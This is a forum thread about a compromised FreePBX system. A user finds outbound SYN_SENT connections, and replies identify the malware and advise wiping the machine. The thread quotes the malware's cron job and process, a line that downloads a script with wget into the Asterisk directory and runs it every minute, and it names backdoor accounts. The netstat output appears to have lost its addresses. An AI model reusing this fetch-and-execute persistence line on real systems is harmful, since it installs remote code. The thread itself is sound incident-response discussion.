What is the significance of to freepbx?

I am doing some work relating to a new gateway router and perimeter firewall. While checking https connectivity from outside I happened to discover this using netstat:

# netstat -an | grep 80
tcp        0      0 *                   LISTEN      
tcp        0      1              SYN_SENT    
tcp        0      1              SYN_SENT    
tcp        0      1              SYN_SENT  
. . .

My question: What is freebsd doing connecting to that address?

That is malicious traffic specific to FreePBX – your machine has already been compromised.

Had your firewall not blocked it, the script would have retrieved more malicious code.

So I see this:

root 24718 1 0 12:18 ? 00:00:00 /bin/sh -c wget -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

Which is likely the compromise script running. How do I tell where it is running from?

That is interesting. I see this in cron:

*/1  * * * * wget -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

Your system is compromised, as @Stewart1 already said. Your best bet is to wipe and start over. You can attempt to clean up, but you are assuming that you are smarter/more determined than the bad guys.

This thread may be useful:

but I strongly agree with @adell4444 – start over.

Which of these are used by FreePBX?


Yes, I see the need to get this fixed with a scrub. But not in the middle of a workday.

sugarmaint supports and supermaint are all known to have been maliciously added. Take a read through the thread that was attached.

